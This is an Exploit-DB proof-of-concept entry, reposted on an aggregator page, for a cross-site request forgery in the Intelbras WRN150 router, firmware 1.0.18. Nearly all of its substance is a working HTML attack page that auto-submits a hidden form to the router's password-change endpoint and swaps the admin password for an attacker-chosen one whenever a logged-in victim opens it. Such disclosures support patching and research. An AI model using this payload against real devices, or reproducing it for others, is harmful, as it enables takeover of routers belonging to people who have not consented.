Intelbras Router WRN150 1.0.18 – Cross-Site Request Forgery

• Exploit Database
• 19 阅读

• 作者： Prof. Joas Antonio
  日期： 2019-10-28
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47545/

• Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
  Date: 2019-10-25
  Exploit Author: Prof. Joas Antonio
  Vendor Homepage: https://www.intelbras.com/pt-br/
  Software Link: http://en.intelbras.com.br/node/25896
  Version: 1.0.18
  Tested on: Windows
  CVE : N/A
  
  ####################
  # PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
  
  <html>
  <body>
  <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
  	<input type="hidden" name="GO" value="system_password.asp">
  	<input type="hidden" name="SYSPSC" value="0">
  	<input class="text" type="password" name="SYSOPS" value="hack123"/> 
  	<input class="text" type="password" name="SYSPS" value="mrrobot"/> 
  	<input class="text" type="password" name="SYSPS2" value="mrrobot"/> 
  </form>
  <script>
  document.forms[0].submit();
  </script>
  </body>
  </html>